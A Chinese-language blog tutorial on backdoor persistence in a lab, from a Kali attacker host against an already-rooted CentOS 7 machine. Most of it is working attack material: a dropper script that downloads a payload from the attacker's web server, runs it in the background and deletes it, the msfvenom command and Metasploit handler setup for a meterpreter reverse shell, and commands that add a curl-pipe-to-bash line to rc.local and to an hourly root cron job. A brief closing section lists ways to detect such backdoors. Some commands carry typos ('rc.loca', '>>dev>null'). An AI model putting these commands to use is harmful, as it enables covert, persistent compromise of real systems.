实验环境:
攻击主机:kali2022.3 IP192.168.1.53 开启apache2
目标主机:centos 7.6 ip192.168.1.63
前提条件
1.已经获取到目标主机root权限
2.已经建立一个WEB网站并将脚本文件和后门程序存放到网站供下载
方式:
通过在启动项和计划任务中添加下载执行脚本命令
目的:
长期维持目标权限,隐藏后门
一、脚本内容
脚本文件jiaoben.sh保存在kali主机192.168.1.53web根目录下
#!/bin/bash
#通过curl命令或wget命令下载payload到/tmp目录
curl -fsSL http://192.168.1.53/muma -o /tmp/muma || wget -q http://192.168.1.53/muma -O /tmp/muma
ls /tmp/muma
#添加后门执行权限
chmod +x /tmp/muma
#后台执行
nohup /tmp/muma &
#nohup 英文全称 no hang up(不挂起),用于在系统后台不挂断地运行命令,退出终端不会影响程序的运行。
#sleep 5秒再删除文件,删除太快可能导致payload还没有运行起来就被删除了。
sleep 5
#删除源文件
rm -rf /tmp/muma
二、生成木马
使用metasploit生成反弹木马
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/muma
在kali主机上开启监听4444
加载模块
msf6 > use exploit/multi/handler
查看配置参数
msf6 exploit(multi/handler) > show options
配置payload
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
配置反弹回来接收信息的主机
msf6 exploit(multi/handler) > set lhost 192.168.1.53
运行监听
msf6 exploit(multi/handler) > run
三、利用获取的权限在启动项中添加命令
echo " bash <(curl -s -L http://192.168.1.53/jiaoben.sh) >> /dev/null 2>&1" >> /etc/rc.d/rc.loca
将命令“bash <(curl -s -L http://192.168.1.53/jiaoben.sh) >> /dev/null 2>&1”添加到启动项中
注:
bash <() #表示将括号中的内容通过 bash 来执行curl -s -L
curl 是一个利用 URL 语法在命令行下进行文件传输的工具
-s --silent #表示静默模式不输出任何内容
-L 跟 http 连接,组合使用的效果是把 http 连接中的文件下载到内存中,然后传 bash,进行执 行
>> /dev/null 2>&1 #不输出任何信息
只要目标主机重新启动就会自动下载并执行脚本内容下载运行后门
四、在计划任务文件中添加命令
在kaili主机获取的shell上执行命令
crontab -e
进入vim编辑器,添加内容如下:
0 */1 * * * root bash <(curl -s -L http://192.168.1.53/jiaoben.sh) >>dev>null 2>&1
注:每小时的0分以root角色执行一次任务
五、查杀后门
存在问题:后门程序没有隐藏进程,很容易被细心的管理员发现
1、在目标主机上运行木马可以通过netstat ano命令查看建立连接的可疑端口
2、使用ps aux命令查看可以端口的进程
3、检查/etc/rc.d/rc.loca文件查看自启动项;命令:ntsysv 查看当前系统开启自启动的服务项
4、查看计划任务文件
vim /etc/crontab 查看是否有未经允许的计划任务
标签:脚本,tmp,命令,主机,1.53,muma,木马,Linux,bash From: https://www.cnblogs.com/jihejihe/p/16909848.html